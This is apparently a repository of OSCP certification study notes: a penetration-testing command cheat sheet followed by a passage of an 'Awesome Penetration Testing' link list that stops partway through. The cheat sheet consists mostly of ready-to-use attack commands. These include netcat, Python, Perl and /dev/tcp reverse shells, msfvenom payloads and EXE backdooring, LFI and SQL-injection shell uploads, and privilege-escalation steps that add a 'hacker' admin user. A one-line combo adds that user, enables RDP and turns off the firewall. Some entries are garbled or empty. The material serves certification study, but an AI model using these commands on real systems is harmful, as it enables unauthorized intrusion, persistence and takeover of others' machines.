├── Go-For-OSCP.md
├── Methodology
├── Penetration-Testing.md
├── README.md
├── linux-template.md
└── windows-template.md
/Go-For-OSCP.md:
--------------------------------------------------------------------------------
1 | # Go-For-OSCP
2 |
3 | I want to share a couple of things that I think helped me preparing the Offensive Security Certified Professional - OSCP certification and what I found useful during the labs and exam. If you have any questions, feel free to contact me.
4 |
5 | Don't forget to:
6 |
7 | * Follow the courseware first and then start practicing in the labs.
8 | * Use additional sources to learn more.
9 | * Join the offensive security PWK forums and social media and talk to other people.
10 |
11 | # Tips
12 | Enable service on every reboot:
13 |
14 | update-rc.d <[SERVICE]> enable
15 |
16 | Extract link from html page:
17 |
18 | cat index.html | grep "href=" | cut -d "/" -f3| grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u
19 |
20 | # Netcat
21 | Interact with application:
22 |
23 | nc -nv <[IP]> <[PORT]>
24 |
25 | Listener:
26 |
27 | nc -nlvp <[PORT]>
28 |
29 | File transfer (client):
30 |
31 | nc -nlvp <[PORT]> > <[FILE]>
32 |
33 | File transfer (server):
34 |
35 | nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]>
36 |
37 | # Bind vs Reverse Shell
38 |
39 | 
40 |
41 | Bind Shell:
42 |
43 | Bob needs Alice's help. Bob set up a listener on port 4444 with -e parameter:
44 |
45 | (BOB): nc -nlvp <[PORT]> -e cmd.exe
46 |
47 | (ALICE): nc -nv <[BOB_IP]> <[PORT]>
48 |
49 | Reverse Shell:
50 |
51 | Alice needs Bob's help. Since Alice is beyond firewall it is impossible to BOB to reach Alice. So Alice create a reverse shell:
52 |
53 | (ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash
54 |
55 | (BOB): nc -nlvp <[PORT]>
56 |
57 | # Zone Transfer
58 |
59 | dnsrecon -t axfr -d <[DOMAIN]>
60 |
61 | # Nmap
62 | nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]>
63 |
64 | # SMB
65 |
66 | nbtscan <[SUBNET]>
67 |
68 | nmap -p139,445 --script smb-enum-users <[SUBNET]>
69 |
70 | nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
71 |
72 | enum4linux
73 |
74 | smbclient -L <[IP]> -N
75 |
76 | smbclient \\<[IP]>\share -N
77 |
78 | # SMTP
79 |
80 | nmap -p25 <[SUBNET]> --open
81 |
82 | nc -nv IP 25
83 |
84 | VRFY <[USERNAME]>
85 |
86 | # SNMP
87 |
88 | Steps: nmap scan udp 161, create target IP list, create community list file, use onesixtyone + snmpwalk
89 |
90 | nmap -sU --open -p161 <[SUBNET]> --open
91 |
92 | onesixtyone -c community -i <[SMNP_IP_LIST]>
93 |
94 | snmpwalk -c public -v1 <[IP]>
95 |
96 | Mib-values (for snmpwalk):
97 |
98 | 1.3.6.1.2.1.25.1.6.0 System Processes
99 |
100 | 1.3.6.1.2.1.25.4.2.1.2 Running Programs
101 |
102 | 1.3.6.1.2.1.25.4.2.1.4 Processes Path
103 |
104 | 1.3.6.1.2.1.25.2.3.1.4 Storage Units
105 |
106 | 1.3.6.1.2.1.25.6.3.1.2 Software Name
107 |
108 | 1.3.6.1.4.1.77.1.2.25 User
109 |
110 | 1.3.6.1.2.1.6.13.1.3 TCP Local Ports
111 |
112 | # File Transfer Linux
113 |
114 | Netcat:
115 |
116 | On Victim machine (client):
117 |
118 | nc -nlvp 4444 > <[FILE]>
119 |
120 | On Attacker machine (server):
121 |
122 | nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
123 |
124 | Curl:
125 |
126 | curl -O http://<[IP]>/<[FILE]>
127 |
128 | Wget:
129 |
130 | wget http://<[IP]>/<[FILE]>
131 |
132 | Recursive wget ftp download:
133 |
134 | wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]>
135 |
136 | # File Transfer Windows
137 |
138 | TFTP (Installed by default up to Windows XP and 2003, In Windows 7, 2008 and above needs to be explicitly added. For this reason tftp not ideal file transfer protocol in most situations.)
139 |
140 | On attacker machine:
141 |
142 | mkdir tftp
143 |
144 | atftpd --deamon --port 69 tftp
145 |
146 | cp <[FILE]> tftp
147 |
148 | On victim machine shell:
149 |
150 | tftp -i <[IP]> GET <[FILE]>
151 |
152 | FTP (Windows operating systems contain a default FTP client that can also be used for file transfer)
153 |
154 | On attacker machine:
155 |
156 | (UNA TANTUM) Install a ftp server. apt-get install pure-ftpd
157 |
158 | (UNA TANTUM) Create new user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234)
159 |
160 | groupadd ftgroup
161 |
162 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
163 |
164 | pure-pw useradd demo -u ftpuser -d /ftphome
165 |
166 | pure-pw mkdb
167 |
168 | cd /etc/pure-ftpd/auth
169 |
170 | ln -s ../conf/PureDB 60pdb
171 |
172 | mkdir -p /ftphome
173 |
174 | chown -R ftpuser:ftpgroup /ftphome
175 |
176 | /etc/init.d/pure-ftpd restart
177 |
178 | (UNA TANTUM) chmod 755 setup-ftp.sh
179 |
180 | On victim machine shell:
181 |
182 | echo open <[IP]> 21 > ftp.txt
183 |
184 | echo USER demo >> ftp.txt
185 |
186 | echo ftp >> ftp.txt
187 |
188 | echo bin >> ftp.txt
189 |
190 | echo GET nc.exe >> ftp.txt
191 |
192 | echo bye >> ftp.txt
193 |
194 | ftp -v -n -s:ftp.txt
195 |
196 | VBScript (in Windows XP, 2003)
197 |
198 | On victim machine shell:
199 |
200 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs &
201 |
202 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs &
203 |
204 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs &
205 |
206 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs &
207 |
208 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs &
209 |
210 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs &
211 |
212 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs &
213 |
214 | echo Err.Clear >> wget.vbs &
215 |
216 | echo Set http = Nothing >> wget.vbs &
217 |
218 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs &
219 |
220 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs &
221 |
222 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs &
223 |
224 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs &
225 |
226 | echo http.Open "GET", strURL, False >> wget.vbs &
227 |
228 | echo http.Send >> wget.vbs &
229 |
230 | echo varByteArray = http.ResponseBody >> wget.vbs &
231 |
232 | echo Set http = Nothing >> wget.vbs &
233 |
234 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs &
235 |
236 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs &
237 |
238 | echo strData = "" >> wget.vbs &
239 |
240 | echo strBuffer = "" >> wget.vbs &
241 |
242 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs &
243 |
244 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs &
245 |
246 | echo Next >> wget.vbs &
247 |
248 | echo ts.Close >> wget.vbs
249 |
250 | cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
251 |
252 | Powershell (In Windows 7, 2008 and above)
253 |
254 | On victim machine shell:
255 |
256 | echo $storageDir = $pwd > wget.ps1
257 |
258 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1
259 |
260 | echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1
261 |
262 | echo $file = "evil.exe" >> wget.ps1
263 |
264 | echo $webclient.DownloadFile($url,$file) >> wget.ps1
265 |
266 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
267 |
268 | Debug.exe utility (In Windows 32bit OS - Works only for file < 64Kb)
269 |
270 | On attacker machine:
271 |
272 | cp <[FILE]> .
273 |
274 | upx -9 <[FILE]> (for compression)
275 |
276 | cp /usr/share/windows-binaries/exe2bat.exe .
277 |
278 | wine exe2bat <[FILE]> <[FILE.txt]>
279 |
280 | On victim machine:
281 |
282 | Paste the content of <[FILE.txt]>
283 |
284 | # XSS
285 |
286 | Stole cookie from xss:
287 |
288 | On attacker machine set listener (nc -nlvp <[PORT]>)
289 |
290 | On victim website
291 |
292 | # LFI/RFI
293 |
294 | Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send , after that try to include log file for code execution.
295 |
296 | &cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00
297 |
298 | # SQL Injection
299 |
300 | Bse:
301 |
302 | any' or 1=1 limit 1;--
303 |
304 | Number of columns:
305 |
306 | order by 1, order by 2, ...
307 |
308 | Expose data from database:
309 |
310 | UNION select 1,2,3,4,5,6
311 |
312 | Enum tables:
313 |
314 | UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
315 |
316 | Shell upload:
317 |
318 | <[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"",4,5,6 into OUTFILE '/var/www/html/evil.php'
319 |
320 | # Buffer Overflow
321 |
322 | /usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
323 |
324 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]>
325 |
326 | # Privilege Escalation
327 |
328 | Vulnerable Services
329 |
330 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula
331 |
332 | sc qc <[VULNERABLE_SERVICE]>
333 |
334 | sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
335 |
336 | sc config <[VULNERABLE_SERVICE]> start= "auto"
337 |
338 | sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
339 |
340 | sc stop <[VULNERABLE_SERVICE]>
341 |
342 | sc start <[VULNERABLE_SERVICE]>
343 |
344 | sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add"
345 |
346 | sc stop <[VULNERABLE_SERVICE]>
347 |
348 | sc start <[VULNERABLE_SERVICE]>
349 |
350 | sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
351 |
352 | sc stop <[VULNERABLE_SERVICE]>
353 |
354 | sc start <[VULNERABLE_SERVICE]>
355 |
356 | Win10:
357 |
358 | reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
359 |
360 | Then ctrl+alt+canc and start virtual keyboard
361 |
362 | # Pass the hash
363 |
364 | Export SMBHASH=<[HASH]>
365 |
366 | pth-winexe -U administrator% //<[IP]> cmd
367 |
368 | # Cracking
369 |
370 | Medusa
371 |
372 | medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
373 |
374 | Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
375 |
376 | ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
377 |
378 | # Firewall
379 |
380 | Enable Remote Desktop:
381 |
382 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
383 |
384 | netsh firewall set service remotedesktop enable
385 |
386 | Enable Remote assistance:
387 |
388 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
389 |
390 | netsh firewall set service remoteadmin enable
391 |
392 | Disable firewall:
393 |
394 | netsh firewall set opmode disable
395 |
396 | One shot ninja combo (New Admin User, Firewall Off + RDP):
397 |
398 | set CMD "net user hacker Hacker123 /add & net localgroup administrators hacker /add & net localgroup \"Remote Desktop Users\" hacker /add & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"
399 |
400 | # Backdooring EXE Files
401 |
402 | msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>
403 |
404 | # Binaries payloads
405 |
406 | Linux:
407 |
408 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
409 |
410 | Windows:
411 |
412 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
413 |
414 | Mac
415 |
416 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
417 |
418 | # Web payloads
419 |
420 | PHP:
421 |
422 | msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
423 | cat <[FILE_NAME.php]> | pbcopy && echo ' <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
424 |
425 | ASP:
426 |
427 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
428 |
429 | JSP:
430 |
431 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
432 |
433 | WAR:
434 |
435 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>
436 |
437 | # Scripting Payloads
438 |
439 | Python:
440 |
441 | msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
442 |
443 | Bash:
444 |
445 | msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
446 |
447 | Perl
448 |
449 | msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
450 |
451 | # Shellcode
452 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
453 |
454 | Linux Based Shellcode:
455 |
456 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
457 |
458 | Windows Based Shellcode:
459 |
460 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
461 |
462 | Mac Based Shellcode:
463 |
464 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
465 |
466 | # Staged vs Non-Staged Payloads
467 |
468 | Staged payload: (useful for bof) (need multi_handler metasploit in order to works)
469 |
470 | Windows/shell/reverse_tcp
471 |
472 | msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
473 |
474 | Non-staged: (ok with netcat listener)
475 |
476 | Windows/shell_reverse_tcp
477 |
478 | msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
479 |
480 | # Handlers
481 |
482 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
483 |
484 | use exploit/multi/handler
485 |
486 | set PAYLOAD <[PAYLOAD_NAME]>
487 |
488 | set LHOST <[IP]>
489 |
490 | set LPORT <[PORT]>
491 |
492 | set ExitOnSession false
493 |
494 | exploit -j -z
495 |
496 | # Shell Spawning
497 |
498 | Python:
499 |
500 | python -c 'import pty; pty.spawn("/bin/sh")'
501 |
502 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
503 |
504 | Bash:
505 |
506 | echo os.system('/bin/bash')
507 |
508 | /bin/sh -i
509 |
510 | exec 5<>/dev/tcp/<[IP]>/<[PORT]> cat <&5 | while read line; do $line 2>&5 >&5; done
511 |
512 | Perl:
513 |
514 | perl —e 'exec "/bin/sh";'
515 |
516 | perl: exec "/bin/sh";
517 |
518 | perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
519 |
520 | Telnet:
521 |
522 | mknod /tmp/yyy p && /bin/bash 0 <[PORT]> 1>/tmp/yyy
523 |
524 | Ruby:
525 |
526 | ruby: exec "/bin/sh"
527 |
528 | Lua:
529 |
530 | lua: os.execute('/bin/sh')
531 |
532 | From within IRB:
533 |
534 | exec "/bin/sh"
535 |
536 | From within vi:
537 |
538 | :!bash
539 |
540 | From within vi:
541 |
542 | :set shell=/bin/bash:shell
543 |
544 | From within nmap:
545 |
546 | !sh
547 |
--------------------------------------------------------------------------------
/Methodology:
--------------------------------------------------------------------------------
1 | http://0daysecurity.com/pentest.html
2 |
--------------------------------------------------------------------------------
/Penetration-Testing.md:
--------------------------------------------------------------------------------
1 | https://github.com/wtsxDev/Penetration-Testing.git
2 |
3 |
4 |
5 | ### **Awesome Penetration Testing** [](http://kalitut.com)
6 |
7 |
8 | A collection of awesome penetration testing resources
9 |
10 | - [Online Resources](#online-resources)
11 | - [Penetration Testing Resources](#penetration-testing-resources)
12 | - [Exploit development](#exploit-development)
13 | - [Social Engineering Resources](#social-engineering-resources)
14 | - [Lock Picking Resources](#lock-picking-resources)
15 | - [Tools](#tools)
16 | - [Penetration Testing Distributions](#penetration-testing-distributions)
17 | - [Basic Penetration Testing Tools](#basic-penetration-testing-tools)
18 | - [Docker for Penetration Testing](#docker-for-penetration-testing)
19 | - [Vulnerability Scanners](#vulnerability-scanners)
20 | - [Network Tools](#network-tools)
21 | - [Wireless Network Tools](#wireless-network-tools)
22 | - [SSL Analysis Tools](#ssl-analysis-tools)
23 | - [Web exploitation](#web-exploitation)
24 | - [Hex Editors](#hex-editors)
25 | - [Crackers](#crackers)
26 | - [Windows Utils](#windows-utils)
27 | - [Linux Utils](#linux-utils)
28 | - [DDoS Tools](#ddos-tools)
29 | - [Social Engineering Tools](#social-engineering-tools)
30 | - [OSInt Tools](#osint-tools)
31 | - [Anonymity Tools](#anonymity-tools)
32 | - [Reverse Engineering Tools](#reverse-engineering-tools)
33 | - [CTF Tools](#ctf-tools)
34 | - [Books](#books)
35 | - [Penetration Testing Books](#penetration-testing-books)
36 | - [Hackers Handbook Series](#hackers-handbook-series)
37 | - [Defensive Development](#defensive-development)
38 | - [Network Analysis Books](#network-analysis-books)
39 | - [Reverse Engineering Books](#reverse-engineering-books)
40 | - [Malware Analysis Books](#malware-analysis-books)
41 | - [Windows Books](#windows-books)
42 | - [Social Engineering Books](#social-engineering-books)
43 | - [Lock Picking Books](#lock-picking-books)
44 | - [Vulnerability Databases](#vulnerability-databases)
45 | - [Security Courses](#security-courses)
46 | - [Information Security Conferences](#information-security-conferences)
47 | - [Information Security Magazines](#information-security-magazines)
48 |
49 |
50 | ### Online Resources
51 | #### Penetration Testing Resources
52 | * [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course
53 | * [PTES](http://www.pentest-standard.org/) - Penetration Testing Execution Standard
54 | * [OWASP](https://www.owasp.org/index.php/Main_Page) - Open Web Application Security Project
55 | * [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - A free online security knowledge library for pentesters / researchers.
56 | * [Vulnerability Assessment Framework](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Penetration Testing Framework.
57 | * [The Pentesters Framework](https://github.com/trustedsec/ptf) - PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used.
58 |
59 | #### Exploit development
60 | * [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode
61 | * [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database
62 | * [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits
63 | * [shellsploit](https://github.com/b3mb4m/shellsploit-framework) - New Generation Exploit Development Kit
64 | * [Voltron](https://github.com/snare/voltron) - A hacky debugger UI for hackers
65 |
66 | #### Social Engineering Resources
67 | * [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - An information resource for social engineers
68 |
69 | #### Lock Picking Resources
70 | * [Schuyler Towne channel](https://www.youtube.com/user/SchuylerTowne/) - Lockpicking videos and security talks
71 | * [/r/lockpicking](https://www.reddit.com/r/lockpicking) - Resources for learning lockpicking, equipment recommendations.
72 |
73 | ### Tools
74 | #### Penetration Testing Distributions
75 | * [Kali](https://www.kali.org/) - A Linux distribution designed for digital forensics and penetration testing
76 | * [ArchStrike](https://archstrike.org/) - An Arch Linux repository for security professionals and enthusiasts
77 | * [BlackArch](https://www.blackarch.org/) - Arch Linux-based distribution for penetration testers and security researchers
78 | * [NST](http://networksecuritytoolkit.org/) - Network Security Toolkit distribution
79 | * [Pentoo](http://www.pentoo.ch/) - Security-focused livecd based on Gentoo
80 | * [BackBox](https://backbox.org/) - Ubuntu-based distribution for penetration tests and security assessments
81 | * [Parrot](https://www.parrotsec.org/) - A distribution similar to Kali, with multiple architecture
82 | * [Fedora Security Lab](https://labs.fedoraproject.org/en/security/) - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
83 |
84 | #### Basic Penetration Testing Tools
85 | * [Metasploit Framework](https://www.metasploit.com/) - World's most used penetration testing software
86 | * [Burp Suite](https://portswigger.net/burp/) - An integrated platform for performing security testing of web applications
87 | * [ExploitPack](http://exploitpack.com/) - Graphical tool for penetration testing with a bunch of exploits
88 | * [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project
89 | * [faraday](https://github.com/infobyte/faraday) - Collaborative Penetration Test and Vulnerability Management Platform
90 | * [evilgrade](https://github.com/infobyte/evilgrade) - The update explotation framework
91 | * [commix](https://github.com/stasinopoulos/commix) - Automated All-in-One OS Command Injection and Exploitation Tool
92 | * [routersploit](https://github.com/reverse-shell/routersploit) - Automated penetration testing software for router
93 | * [redsnarf] (https://github.com/nccgroup/redsnarf) - Post-exploitation tool for grabbing credentials
94 |
95 | #### Docker for Penetration Testing
96 | * `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/)
97 | * `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy)
98 | * `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)
99 | * `docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/)
100 | * `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/)
101 | * `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/)
102 | * `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/)
103 | * `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/)
104 | * `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)
105 | * `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/)
106 | * `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)
107 | * `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)
108 | * `docker-compose build && docker-compose up` - [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)
109 | * `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)
110 | * `docker pull bkimminich/juice-shop` - [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--)
111 |
112 | #### Vulnerability Scanners
113 | * [Nexpose](https://www.rapid7.com/products/nexpose/) - Vulnerability Management & Risk Management Software
114 | * [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) - Vulnerability, configuration, and compliance assessment
115 | * [Nikto](https://cirt.net/nikto2) - Web application vulnerability scanner
116 | * [OpenVAS](http://www.openvas.org/) - Open Source vulnerability scanner and manager
117 | * [OWASP Zed Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - Penetration testing tool for web applications
118 | * [Secapps](https://secapps.com/) - Integrated web application security testing environment
119 | * [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework
120 | * [Wapiti](http://wapiti.sourceforge.net/) - Web application vulnerability scanner
121 | * [WebReaver](http://www.webreaver.com/) - Web application vulnerability scanner for Mac OS X
122 | * [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR
123 | * [arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework
124 |
125 | #### Network Tools
126 | * [nmap](https://nmap.org/) - Free Security Scanner For Network Exploration & Security Audits
127 | * [pig](https://github.com/rafael-santiago/pig) - A Linux packet crafting tool
128 | * [tcpdump/libpcap](http://www.tcpdump.org/) - A common packet analyzer that runs under the command line
129 | * [Wireshark](https://www.wireshark.org/) - A network protocol analyzer for Unix and Windows
130 | * [Network Tools](http://network-tools.com/) - Different network tools: ping, lookup, whois, etc
131 | * [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - A Swiss army knife for for network sniffing
132 | * [Intercepter-NG](http://sniff.su/) - a multifunctional network toolkit
133 | * [SPARTA](http://sparta.secforce.com/) - Network Infrastructure Penetration Testing Tool
134 | * [dnschef](http://thesprawl.org/projects/dnschef/) - A highly configurable DNS proxy for pentesters
135 | * [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service
136 | * [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results
137 | * [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper
138 | * [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS Enumeration Script
139 | * [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers
140 | * [passivedns-client](https://github.com/chrislee35/passivedns-client) - Provides a library and a query tool for querying several passive DNS providers
141 | * [passivedns](https://github.com/gamelinux/passivedns) - A network sniffer that logs all DNS server replies for use in a passive DNS setup
142 | * [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
143 | * [Zarp](https://github.com/hatRiot/zarp) - Zarp is a network attack tool centered around the exploitation of local networks
144 | * [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers
145 | * [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH
146 | * [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols
147 | * [DET](https://github.com/sensepost/DET) - DET is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time
148 | * [pwnat](https://github.com/samyk/pwnat) - punches holes in firewalls and NATs
149 | * [dsniff](https://www.monkey.org/~dugsong/dsniff/) - a collection of tools for network auditing and pentesting
150 | * [tgcd](http://tgcd.sourceforge.net/) - a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls
151 | * [smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool
152 | * [scapy](https://github.com/secdev/scapy) - a python-based interactive packet manipulation program & library
153 | * [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework
154 | * [Debookee (MAC OS X)](http://www.iwaxx.com/debookee/) - Intercept traffic from any device on your network
155 | * [Dripcap](https://github.com/dripcap/dripcap) - Caffeinated packet analyzer
156 |
157 | #### Wireless Network Tools
158 | * [Aircrack-ng](http://www.aircrack-ng.org/) - a set of tools for auditing wireless network
159 | * [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS
160 | * [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against Wifi Protected Setup
161 | * [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool
